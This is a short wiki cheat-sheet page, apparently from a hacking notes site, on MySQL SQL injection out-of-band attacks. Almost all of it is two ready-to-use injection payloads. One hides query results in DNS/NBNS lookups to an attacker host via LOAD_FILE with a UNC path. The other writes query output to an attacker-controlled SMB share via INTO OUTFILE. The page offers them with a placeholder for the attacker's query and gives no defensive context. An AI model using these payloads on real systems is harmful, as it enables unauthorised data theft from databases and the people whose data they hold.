User Tools

Site Tools


hacking:sql_injection:mysql:out_of_band_channel_attacks

Hacking - SQL Injection - MySQL - Out of Band Channel Attacks

Makes a NBNS query request/DNS resolution request to yourhost.com:

?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))

Writes data to your shared folder/file:

?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')
  • {INJECTION} = You want to run the query.
hacking/sql_injection/mysql/out_of_band_channel_attacks.txt · Last modified: 2020/07/15 10:30 by 127.0.0.1

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki